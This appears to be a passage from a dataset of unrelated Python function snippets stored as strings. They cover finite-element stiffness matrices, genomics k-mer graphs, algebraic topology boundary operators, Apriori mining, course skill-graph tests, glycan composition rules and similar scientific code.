10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (5*Ex*c**2 + 25*Ey*nu_xy*b**2 - 2*b**2*(15*Ey*nu_xy - G*nu_xy*nu_yx + G))/(10*b**2*c*(nu_xy*nu_yx - 1)), (-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2 + Ey*nu_xy*b**2/2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-Ey*nu_xy*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*nu_xy*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), -Ey*nu_xy/(nu_xy*nu_yx - 1)],\n [(-Ex*nu_yx*b**2/2 + Ex*c**2/2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*c**2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*nu_yx*b**2/2 + Ex*c**2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), -Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))]])\n \n # Calculate the stiffness of a weak spring for the drilling degree of freedom (rotation\n # about local z). We'll set the weak spring to be 1000 times weaker than any of the other\n # rotational stiffnesses in the matrix.\n k_rz = min(abs(k[1, 1]), abs(k[2, 2]), abs(k[4, 4]), abs(k[5, 5]),\n abs(k[7, 7]), abs(k[8, 8]), abs(k[10, 10]), abs(k[11, 11])\n )/1000\n\n # The matrix currently only holds terms related to bending action. We need to expand it to\n # with placeholders for all the degrees of freedom so it can be directly added to the\n # membrane stiffness matrix later on.\n\n # Initialize the expanded stiffness matrix to all zeros\n k_exp = zeros((24, 24))\n\n # Step through each term in the unexpanded stiffness matrix\n\n # i = Unexpanded matrix row\n for i in range(12):\n\n # j = Unexpanded matrix column\n for j in range(12):\n \n # Find the corresponding term in the expanded stiffness\n # matrix\n\n # m = Expanded matrix row\n if i in [0, 3, 6, 9]: # indices associated with deflection in z\n m = 2*i + 2\n if i in [1, 4, 7, 10]: # indices associated with rotation about x\n m = 2*i + 1\n if i in [2, 5, 8, 11]: # indices associated with rotation about y\n m = 2*i\n\n # n = Expanded matrix column\n if j in [0, 3, 6, 9]: # indices associated with deflection in z\n n = 2*j + 2\n if j in [1, 4, 7, 10]: # indices associated with rotation about x\n n = 2*j + 1\n if j in [2, 5, 8, 11]: # indices associated with rotation about y\n n = 2*j\n \n # Ensure the indices are integers rather than floats\n m, n = round(m), round(n)\n\n # Add the term from the unexpanded matrix into the expanded\n # matrix\n k_exp[m, n] = k[i, j]\n \n # Add the drilling degree of freedom's weak spring\n k_exp[5, 5] = k_rz\n k_exp[11, 11] = k_rz\n k_exp[17, 17] = k_rz\n k_exp[23, 23] = k_rz\n \n # Return the local stiffness matrix\n return k_exp", "def drawValidationNeedles(self, nb=None):\r\n # productive #onButton\r\n profprint()\r\n # reset report table\r\n # print \"Draw manually segmented needles...\"\r\n # self.table =None\r\n # self.row=0\r\n widget = slicer.modules.NeedleFinderWidget\r\n if nb: widget.editNeedleTxtBox.value = nb\r\n widget.initTableView()\r\n self.deleteEvaluationNeedlesFromTable()\r\n while slicer.util.getNodes('manual-seg_'+str(widget.editNeedleTxtBox.value)) != {}:\r\n nodes = slicer.util.getNodes('manual-seg_'+str(widget.editNeedleTxtBox.value))\r\n for node in nodes.values():\r\n slicer.mrmlScene.RemoveNode(node)\r\n\r\n tableValueCtrPt = [[[999, 999, 999] for i in range(100)] for j in range(100)]\r\n modelNodes = slicer.mrmlScene.GetNodesByClass('vtkMRMLAnnotationFiducialNode')\r\n nbNode = modelNodes.GetNumberOfItems()\r\n for nthNode in range(nbNode):\r\n modelNode = slicer.mrmlScene.GetNthNodeByClass(nthNode, 'vtkMRMLAnnotationFiducialNode')\r\n modelNodeName = modelNode.GetName().strip('.')\r\n modelNodeName = modelNodeName.strip('\\r')\r\n if modelNode.GetName()[0] == '.' and len(modelNodeName.split('-')) == 2:\r\n needleNumber = int(modelNodeName.split('-')[0])\r\n needleStep = int(modelNodeName.split('-')[1])\r\n # if modelNode.GetAttribute(\"ValidationNeedle\") == \"1\":\r\n # needleNumber = int(modelNode.GetAttribute(\"NeedleNumber\"))\r\n if needleNumber == widget.editNeedleTxtBox.value:\r\n # needleStep = int(modelNode.GetAttribute(\"NeedleStep\"))\r\n coord = [0, 0, 0]\r\n modelNode.GetFiducialCoordinates(coord)\r\n tableValueCtrPt[needleNumber][needleStep] = coord\r\n print needleNumber, needleStep, coord\r\n # print self.tableValueCtrPt[needleNumber][needleStep]\r\n\r\n for i in range(len(tableValueCtrPt)):\r\n if not all(e == [999, 999, 999] for e in tableValueCtrPt[i]):\r\n # if self.tableValueCtrPt[i][1] != [999, 999, 999]:\r\n colorVar = random.randrange(50, 100, 1) # ??? /(100.)\r\n controlPointsUnsorted = [val for val in tableValueCtrPt[i] if val != [999, 999, 999]]\r\n controlPoints = self.sortTable(controlPointsUnsorted, (2, 1, 0))\r\n # print \"Control points unsorted\", controlPointsUnsorted\r\n print \"Control points\", controlPoints\r\n self.addNeedleToScene(controlPoints, i, 'Validation')\r\n self.observeManualNeedles()\r\n else:\r\n # print i\r\n pass\r\n self.findAxialSegmentationLimitFromMarker(bForceFallback=True) #AM force the presence of the limit marker\r", "def boundary_op_n(v):\r\n h = list(v.dic.keys())[0]\r\n p = len(h) - 1\r\n s = P_chains([],[])\r\n if (p != 0) and (isinstance(h, str) != True) and (isinstance(h, frozenset) != True) and (isinstance(h, ImmutableMatrix) != True):\r\n if (is_int(list(v.dic.keys())) == True):\r\n for u in v.dic.keys():\r\n c = 0\r\n for i in u: \r\n w = list(u)[:]\r\n w.remove(i)\r\n if (orientation_function(tuple(tuple_sorted(tuple(w))),tuple(w),p) == True):\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**c) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n else:\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**(c+1)) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n return s\r\n else:\r\n aux = P_chains([],[])\r\n D = {}\r\n ct = 0\r\n st = []\r\n for u in v.dic.keys():\r\n for x in u:\r\n if x not in st:\r\n st.append(x)\r\n for i in st:\r\n D[tuple([ct])] = i\r\n ct = ct + 1\r\n for u in v.dic.keys():\r\n w2 = []\r\n for x in u:\r\n for y in list(D.keys()):\r\n if (x == D[y]):\r\n w2.append(y)\r\n aux = aux + P_chains([tuple(w2)],[v.dic[u]]) \r\n v = aux\r\n for u in v.dic.keys():\r\n c = 0\r\n for i in u: \r\n w = list(u)[:]\r\n w.remove(i)\r\n if (orientation_function(tuple(tuple_sorted(tuple(w))),tuple(w),p) == True):\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**c) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n else:\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**(c+1)) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n s2 = P_chains([],[])\r\n for u in s.dic.keys():\r\n w2=[]\r\n for i in u:\r\n w2.append(D[i])\r\n s2 = s2 + P_chains([tuple(w2)],[s.dic[u]])\r\n \r\n return s2\r\n else:\r\n return s", "def build_knn(coords, k=6, **kwargs):\n \n tree = BallTree(coords, **kwargs)\n _, ind = tree.query(coords, k=k+1) # the first k is \"oneself\"\n pairs = pairs_from_knn(ind)\n return pairs", "def makekaryo(sp1chrom, sp2chrom, fai1, fai2):\n# import ipdb; ipdb.set_trace()\n fai1_name = fai1.split(\".\")[0]\n fai2_name = fai2.split(\".\")[0]\n fai_pair = \"{}-{}\".format(fai1_name, fai2_name)\n for fai in [fai1, fai2]:\n karyodict = {}\n with open(fai, 'r') as fai_l:\n for line in fai_l:\n x = line.strip().split()\n chrom = x[0]\n size = x[1]\n karyodict[chrom] = size\n if fai is fai1:\n fname = \"circos.{}.{}.karyotype.txt\".format(fai1_name, fai_pair)\n withchrom(fname, sp1chrom, karyodict)\n elif fai is fai2:\n fname = \"circos.{}.{}.karyotype.txt\".format(fai2_name, fai_pair)\n withchrom(fname, sp2chrom, karyodict)\n return(None)", "def test_find_long_chains(self):\n # a --> d --> j g h --> i\n # b _/ c --> e --> f\n self._build_sample_graph()\n # Adding singleton\n sg = self.skill_graph.add(Skill.build('g', ''))\n # Adding short path\n sh = self.skill_graph.add(Skill.build('h', ''))\n si = self.skill_graph.add(Skill.build('i', ''))\n self.skill_graph.add_prerequisite(si.id, sh.id)\n # Making path longer\n sj = self.skill_graph.add(Skill.build('j', ''))\n self.skill_graph.add_prerequisite(sj.id, self.sd.id)\n skill_map = SkillMap.load(self.course)\n result = SkillMapMetrics(skill_map).long_chains(2)\n expected = [\n [self.sa.id, self.sd.id, sj.id],\n [self.sb.id, self.sd.id, sj.id],\n [self.sc.id, self.se.id, self.sf.id]\n ]\n self.assertEqual(sorted(expected), sorted(result))", "def test_split_orphan(self):\r\n orphans = self.split_mongo.get_orphans(self.split_course_key)\r\n self.assertEqual(len(orphans), 3, \"Wrong # {}\".format(orphans))\r\n location = self.split_course_key.make_usage_key('chapter', 'OrphanChapter')\r\n self.assertIn(location, orphans)\r\n location = self.split_course_key.make_usage_key('vertical', 'OrphanVert')\r\n self.assertIn(location, orphans)\r\n location = self.split_course_key.make_usage_key('html', 'OrphanHtml')\r\n self.assertIn(location, orphans)", "def test_fk():\n\n joints = [0.0, 2.9, 1.3, 4.2, 1.4, 0.0]\n\n path_planner = PathPlanner(\"manipulator\")\n\n pose = path_planner.get_fk(joints)\n\n print pose", "def create_Ck(Lksub1, k):\r\n Ck = set()\r\n len_Lksub1 = len(Lksub1)\r\n list_Lksub1 = list(Lksub1)\r\n for i in range(len_Lksub1):\r\n for j in range(1, len_Lksub1):\r\n l1 = list(list_Lksub1[i])\r\n l2 = list(list_Lksub1[j])\r\n l1.sort()\r\n l2.sort()\r\n if l1[0:k-2] == l2[0:k-2]:\r\n Ck_item = list_Lksub1[i] | list_Lksub1[j]\r\n # pruning\r\n if is_apriori(Ck_item, Lksub1):\r\n Ck.add(Ck_item)\r\n return Ck", "def InertiaBranch(fkList, massList, mInertList, jParams):\n hList = [LinkInertia(fkList[i], massList[i], mInertList[i], jParams) for i in range(len(massList))]\n H = reduce(lambda h1, h2: h1 + h2, hList)\n return csd.simplify(H)", "def discretizeSecondMember (bsp, knotlist,p, nbquadrature):\n\tF = np.zeros(bsp.N-2)\n\tfor i in range(1, bsp.N-1): #i est l'indice des Ni\n\t\t\n\t\t\n\t\t# on regarde sur tous les knots pour chaque Ni\n\t\tfor iknot in range(len(knotlist)-1):\n\t\t\t\n\t\t\tF[i-1] = F[i-1] + legendreGauss(secondMember, nbquadrature, knotlist[iknot], knotlist[iknot+1], i, bsp)\n\t\t\t\t\t\n\treturn F;", "def test_kn(size):\n graph = Graph()\n for one in range(size):\n for two in range(one + 1, size):\n graph.add_edge(one, two)\n eq_(size-1, graph.approx_treewidth())", "def kchainbasis(h, k):\n\n import itertools as it\n kchains = set()\n for e in h.edges():\n if len(e) == k + 1:\n kchains.add(tuple(sorted(e.uidset)))\n elif len(e) > k + 1:\n kchains.update(set(it.combinations(sorted(e.uidset), k + 1)))\n return sorted(list(kchains))", "def makeB2TwoDetachedDimuons(name,config,inputSel) :\n # define cuts on B object\n wm = ['in_range(%s,AM,%s)' % (config['MASS_MIN']['B'],\n config['MASS_MAX']['B'])]\n wm = '('+('|'.join(wm))+')'\n comboCuts = [LoKiCuts(['SUMPT'],config).code(),wm]\n comboCuts = LoKiCuts.combine(comboCuts)\n momCuts = LoKiCuts(['VCHI2DOF','BPVVDCHI2','BPVIPCHI2','BPVDIRA'], \n config).code()\n B2KSKS = CombineParticles(\"Combine\"+name)\n B2KSKS.DecayDescriptor = 'B0 -> KS0 KS0'\n B2KSKS.CombinationCut = comboCuts\n B2KSKS.MotherCut = momCuts\n \n return Selection(name,\n Algorithm = B2KSKS,\n RequiredSelections = inputSel)", "def test_find_long_chains_multiple(self):\n # a -> b -> c -> ... x\n # \\________________/\n self.skill_graph = SkillGraph.load()\n old_skill = self.skill_graph.add(Skill.build('o', ''))\n last_skill = self.skill_graph.add(Skill.build('l', ''))\n self.skill_graph.add_prerequisite(last_skill.id, old_skill.id)\n chain_ids = [old_skill.id]\n for index in range(CHAINS_MIN_LENGTH):\n new_skill = self.skill_graph.add(Skill.build(str(index), ''))\n chain_ids.append(new_skill.id)\n self.skill_graph.add_prerequisite(new_skill.id, old_skill.id)\n old_skill = new_skill\n self.skill_graph.add_prerequisite(old_skill.id, last_skill.id)\n skill_map = SkillMap.load(self.course)\n result = SkillMapMetrics(skill_map).long_chains()\n self.assertEqual([chain_ids], result)", "def rbd2_koon() -> NonRepairableRBD:\n edges = [(1, 2), (2, 3), (2, 4), (4, 7), (3, 5), (5, 6), (6, 7), (7, 8)]\n reliabilities = {\n 2: surv.Weibull.from_params([20, 2]),\n 3: surv.Weibull.from_params([100, 3]),\n 4: surv.Weibull.from_params([50, 20]),\n 5: surv.Weibull.from_params([15, 1.2]),\n 6: surv.Weibull.from_params([80, 10]),\n 7: StandbyModel(\n [\n surv.Weibull.from_params([5, 1.1]),\n surv.Weibull.from_params([5, 1.1]),\n surv.Weibull.from_params([5, 1.1]),\n surv.Weibull.from_params([5, 1.1]),\n ]\n ),\n }\n k = {7: 2}\n return NonRepairableRBD(edges, reliabilities, k)", "def create_Ck(Lksub1, k):\n Ck = set()\n len_Lksub1 = len(Lksub1)\n Lksub = list(Lksub1)\n for i in range(len_Lksub1):\n for j in range(1, len_Lksub1):\n l1 = list(Lksub[i])\n l2 = list(Lksub[j])\n l1.sort()\n l2.sort()\n if l1[0:k-2] == l2[0:k-2]:\n Ck_item = Lksub[i] | Lksub[j]\n # pruning\n if is_apriori(Ck_item, Lksub1):\n Ck.add(Ck_item)\n return Ck", "def bkMatrix(km1basis, kbasis):\n bk = np.zeros((len(km1basis), len(kbasis)), dtype=int)\n for cell in kbasis:\n for idx in range(len(cell)):\n face = cell[:idx] + cell[idx + 1:]\n row = km1basis.index(face)\n col = kbasis.index(cell)\n bk[row, col] = 1\n return bk", "def create_balanced(self, k, dim):\n j = (1.0 - k) / (dim - 1)\n self.m = []\n for index in range(dim):\n row = [j] * dim\n row[index] = k\n self.m.append(row)\n self.num_states = dim\n self.convert_to_measure_matrix()\n pprint(self.m)", "def build_karels():\n build_karel1()\n build_karel2()\n build_karel3()\n build_karel4()", "def slot_avaialble(application, approved_loans, K):\n return len(intersected_applications(application, approved_loans)) < K", "def constructAdjacencies(self, seq):\n prev = seq[:self.kmer_size].upper()\n prev_strandless = strandless(prev)\n for i in xrange(1, len(seq) - self.kmer_size + 1):\n prev_size = len(self.G)\n kmer = seq[i:i + self.kmer_size].upper()\n if \"N\" in kmer or \"N\" in prev:\n continue\n kmer_strandless = strandless(kmer)\n if prev == prev_strandless:\n # exiting right side of previous kmer\n if kmer == kmer_strandless:\n # entering left side of next kmer\n self.G.add_edge(prev + \"_R\", kmer + \"_L\")\n else:\n # entering right side of next kmer\n self.G.add_edge(prev + \"_R\", reverseComplement(kmer) + \"_R\")\n else:\n # exiting left side of previous kmer\n if kmer == kmer_strandless:\n # entering left side of next kmer\n self.G.add_edge(reverseComplement(prev) + \"_L\", kmer + \"_L\")\n else:\n # entering right side of next kmer\n self.G.add_edge(reverseComplement(prev) + \"_L\", reverseComplement(kmer) + \"_R\")\n assert prev_size == len(self.G)\n prev = kmer\n prev_strandless = kmer_strandless", "def allocate_candies(A, k):\n lo = 0\n\n # the maximum number of candies we could theoretically allocate\n # to each children (if we ignored piles)\n hi = sum(A) // k\n\n while lo < hi:\n mid = (lo + hi + 1) // 2\n\n # n is the maximum number of children that can get a pile of candies\n # of size mid\n n = 0\n for pile in A:\n n += pile // mid\n\n # if we can feed more children than expected, we could give less\n # more candies to each children\n if n >= k:\n lo = mid\n\n # we are trying to give too many candies per children\n else:\n hi = mid - 1\n\n return lo", "def get_2away_pairs(local_index_to_kmer, k):\n\n #These are the base cases for the recursion. If k==1, the kmers obviously can't differ in exactly two bases, so return an empty list. if k==2, return every pair of indices where the kmers at those indices differ at exactly two bases.\n if k == 1:\n return []\n if k == 2:\n return [(i, j) for (i,j) in combinations(local_index_to_kmer, 2) if local_index_to_kmer[i][0] != local_index_to_kmer[j][0] and local_index_to_kmer[i][1] != local_index_to_kmer[j][1]]\n\n #Get the two halves of the kmer\n k_L = k//2\n k_R = k-k_L\n\n #initialize dictionaries in which the key is the hash of half of the kmer, and the value is a list of indices of the kmers with that same hash\n kmer_L_hashes = defaultdict(list)\n kmer_R_hashes = defaultdict(list)\n\n #initialize pairs, which will be returned by get_1away_pairs\n pairs = []\n\n #initialize dictionaries containing the left halves and the right halves (since we will have to check cases where the left half differs by 1 and the right half differs by 1)\n local_index_to_kmer_L = {}\n local_index_to_kmer_R = {}\n\n #for each kmer, calculate its left hash and right hash, then add its index to the corresponding entries of the dictionary\n for i, kmer in local_index_to_kmer.items():\n kmer_L = kmer[:k_L]\n kmer_R = kmer[k_L:]\n local_index_to_kmer_L[i] = kmer_L\n local_index_to_kmer_R[i] = kmer_R\n kmer_L_hashes[kmer_to_int(kmer_L)] += [i]\n kmer_R_hashes[kmer_to_int(kmer_R)] += [i]\n\n #for each left hash in which there are multiple kmers with that left hash, find the list of pairs in which the right half differs by 2. (aka, if left half matches, recurse on right half).\n for kmer_L_hash_indices in kmer_L_hashes.values(): #same in first half\n if len(kmer_L_hash_indices) > 1:\n pairs += get_2away_pairs({kmer_L_hash_index:local_index_to_kmer[kmer_L_hash_index][k_L:] for kmer_L_hash_index in kmer_L_hash_indices}, k_R) #differ by 2 in right half\n\n #for each right hash in which there are multiple kmers with that right hash, find the list of pairs in which the left half differs by 2. (aka, if right half matches, recurse on left half).\n for kmer_R_hash_indices in kmer_R_hashes.values(): #same in second half\n if len(kmer_R_hash_indices) > 1:\n pairs += get_2away_pairs({kmer_R_hash_index:local_index_to_kmer[kmer_R_hash_index][:k_L] for kmer_R_hash_index in kmer_R_hash_indices}, k_L) #differ by 2 in left half\n\n #Find matching pairs where the left half is one away, and the right half is one away\n possible_pairs_L = set(get_1away_pairs(local_index_to_kmer_L,k_L))\n possible_pairs_R = set(get_1away_pairs(local_index_to_kmer_R,k_R))\n pairs += list(possible_pairs_L.intersection(possible_pairs_R))\n return(pairs)", "def boundary(self):\n\n answer = self.zero()\n if self.torsion == 2:\n for k in self.keys():\n for idx in range(0, len(k)):\n bdry_summand = k[:idx] + k[idx + 1:]\n if k[idx] in bdry_summand:\n answer += self.create({bdry_summand: 1})\n return answer\n if self.convention == 'Berger-Fresse':\n for k, v in self.items():\n # determining the signs of the summands\n signs = {}\n alternating_sign = 1\n for idx, i in enumerate(k):\n if i in k[idx + 1:]:\n signs[idx] = alternating_sign\n alternating_sign *= (-1)\n elif i in k[:idx]:\n occurs = (pos for pos, j in enumerate(k[:idx]) if i == j)\n signs[idx] = signs[max(occurs)] * (-1)\n else:\n signs[idx] = 0\n # computing the summands\n for idx in range(0, len(k)):\n bdry_summand = k[:idx] + k[idx + 1:]\n if k[idx] in bdry_summand:\n answer += self.create({bdry_summand: signs[idx] * v})\n if self.convention == 'McClure-Smith':\n for k, v in self.items():\n sign = 1\n for i in range(1, max(k) + 1):\n for idx in (idx for idx, j in enumerate(k) if j == i):\n new_k = k[:idx] + k[idx + 1:]\n if k[idx] in new_k:\n answer += answer.create({new_k: v * sign})\n sign *= -1\n sign *= -1\n return answer", "def kmodels(wordlen: int, k: int, input=None, output=None):\n\n assert 0 <= k < 2**wordlen\n if output is None:\n output = _fresh()\n\n if input is None:\n input = _fresh()\n\n imap, omap = BundleMap({input: wordlen}), BundleMap({output: 1})\n atoms = map(aiger.atom, imap[input])\n\n active = False\n expr = aiger.atom(False)\n for atom, bit in zip(atoms, encode_int(wordlen, k, signed=False)):\n active |= bit\n if not active: # Skip until first 1.\n continue\n expr = (expr | atom) if bit else (expr & atom)\n\n aig = expr.aig['o', {expr.output: omap[output][0]}]\n aig |= aiger.sink(imap[input])\n return aigbv.AIGBV(imap=imap, omap=omap, aig=aig)", "def beam(t, n, height):\n hollow(t, n*height)\n fdbk(t, n)\n hollow(t, -n*height)", "def test_weyl_specialize_id(self):\n a, b, c = 0.0, 0.0, 0.0\n for da, db, dc in DELTAS:\n for k1l, k1r, k2l, k2r in K1K2SB:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n self.check_two_qubit_weyl_specialization(\n k1 @ Ud(a + da, b + db, c + dc) @ k2,\n 0.999,\n TwoQubitWeylIdEquiv,\n {\"rz\": 4, \"ry\": 2},\n )", "def __init__(self, k=2):\n assert k >= 2\n self.k = k", "def make_mammalian_n_glycan_neighborhoods():\n neighborhoods = NeighborhoodCollection()\n\n _neuraminic = \"(%s)\" % ' + '.join(map(str, (\n FrozenMonosaccharideResidue.from_iupac_lite(\"NeuAc\"),\n FrozenMonosaccharideResidue.from_iupac_lite(\"NeuGc\")\n )))\n _terminal = _neuraminic + \\\n \" + max(%s - %%d, 0)\" % FrozenMonosaccharideResidue.from_iupac_lite(\"Hex\")\n _hexose = \"(%s)\" % ' + '.join(\n map(str, map(FrozenMonosaccharideResidue.from_iupac_lite, ['Hex', ])))\n _hexnac = \"(%s)\" % ' + '.join(\n map(str, map(FrozenMonosaccharideResidue.from_iupac_lite, ['HexNAc', ])))\n\n high_mannose = CompositionRangeRule(\n _hexose, 3, 12) & CompositionRangeRule(\n _hexnac, 2, 2) & CompositionRangeRule(\n _neuraminic, 0, 0)\n high_mannose.name = \"high-mannose\"\n neighborhoods.add(high_mannose)\n\n base_hexnac = 3\n base_terminal_groups = 2\n for i, spec in enumerate(['hybrid', 'bi', 'tri', 'tetra', 'penta', \"hexa\", \"hepta\"]):\n if spec == 'hybrid':\n rule = CompositionRangeRule(\n _hexnac, base_hexnac - 1, base_hexnac + 1\n ) & CompositionRangeRule(\n _neuraminic, 0, base_terminal_groups) & CompositionRangeRule(\n _hexose, base_hexnac + i - 1,\n base_hexnac + i + 3)\n rule.name = spec\n neighborhoods.add(rule)\n else:\n sialo = CompositionRangeRule(\n _hexnac, base_hexnac + i - 1, base_hexnac + i + 1\n ) & CompositionRangeRule(\n (_neuraminic), 1, base_terminal_groups + i\n ) & CompositionExpressionRule(\n \"(Hex > %d) & (Hex < (%d - (NeuAc + NeuGc)))\" % (base_hexnac + i - 2, base_hexnac + (2 * i) + 3))\n\n sialo.name = \"%s-antennary\" % spec\n asialo = CompositionRangeRule(\n _hexnac, base_hexnac + i - 1, base_hexnac + i + 1\n ) & CompositionRangeRule(\n _neuraminic, 0, 1 if i < 2 else 0\n ) & CompositionRangeRule(\n _hexose, base_hexnac + i - 1,\n base_hexnac + (2 * i) + 3)\n asialo.name = \"asialo-%s-antennary\" % spec\n neighborhoods.add(sialo)\n neighborhoods.add(asialo)\n return neighborhoods", "def createTableBOW(self,DBcursor):\n sql=\"create table if not exists BOW (bow_id INTEGER PRIMARY KEY, word TEXT, total_count INTEGER, netloc_count INTEGER, path_count INTEGER, params_count INTEGER, query_count INTEGER, fragment_count INTEGER);\"\n DBcursor.execute(sql)", "def collins_kimball(k_tst, k_diff):\n return k_tst * k_diff / (k_tst + k_diff)", "def GenKmers(consensus,MinLen=18,MaxLen=22):\n lengths = [i+MinLen for i in range(MaxLen+1-MinLen)]\n kmers = []\n for length in lengths:\n for i in range(len(consensus)+1 - length):\n kmer = consensus[i:i+length]\n kmers.append((i,kmer))\n return kmers", "def build_leftpart():\n # build kelly.\n build_kelly()\n # copy kelly to 3.\n copy(0, 3)\n\n # build june in slots 0,1,2\n build_june()\n # copy kelly to slot 1\n copy(3, 1)\n\n # smash together to get (june kelly) in 0\n smash()\n # copy (june kelly) to 1\n copy(0, 1)\n # build horace in 0\n build_horace(0)\n # smash together to get (horace (june kelly)) in 0\n smash()\n # wrap with an S for the whole left part.\n apply_card(\"S\", 0)", "def testBeliefs2sk(self):", "def identify_leaflets_cluster(self,pts,vec,topologize_time_limit=30,max_count_asymmetry=0.05):\n\t\timport scipy\n\t\timport sklearn\n\t\timport sklearn.neighbors\n\t\timport sklearn.cluster\n\t\tnlipids = len(pts)\n\t\t#---time limit on the topologize function which joins broken bilayers e.g. a saddle that crosses PBCs\n\t\ttry:\n\t\t\twith time_limit(topologize_time_limit): \n\t\t\t\twrapper = topologize(pts,vec,\n\t\t\t\t\t**({'tol':self.topologize_tolerance} if self.topologize_tolerance else {}))\n\t\texcept TimeoutException: \n\t\t\tstatus('topologize failed to join the bilayer. '\n\t\t\t\t'if it is broken over PBCs e.g. a saddle, this is a serious error which may go undetected. '\n\t\t\t\t'make sure you always inspect the topology later.',tag='error')\n\t\t\twrapper = np.zeros((len(pts),3))\n\t\tfindframe = pts + wrapper*np.array(vec)\n\t\t#---ensure that all points are in the box\n\t\tfindframe += vec*(findframe<0) - vec*(findframe>vec)\n\t\t#---previous calculation of connectivity was done manually\n\t\tif False:\n\t\t\t#---conservative cutoff gets lots of nearby points\n\t\t\tcutoff = 10.0\n\t\t\tcutoff_short = 2.0\n\t\t\t#---make a K-D tree from the points\n\t\t\ttree = scipy.spatial.ckdtree.cKDTree(findframe,boxsize=np.concatenate((vec,vec))+0.*eps)\n\t\t\t#---find the nearest reference points for each instantaneous point\n\t\t\tclose,nns = tree.query(findframe,distance_upper_bound=cutoff,k=20)\n\t\t\t#---construct the neighbor list\n\t\t\tsubjects = np.where(np.all((close<cutoff,close>0),axis=0))\n\t\t\t#---get the pairs of neighbors\n\t\t\tsubjects,neighbors = subjects[0],nns[subjects]\n\t\t\tpds = np.ones((nlipids,nlipids))*0.0\n\t\t\tpds[tuple((np.arange(nlipids),np.arange(nlipids)))] = 0.0\n\t\t\tnears = 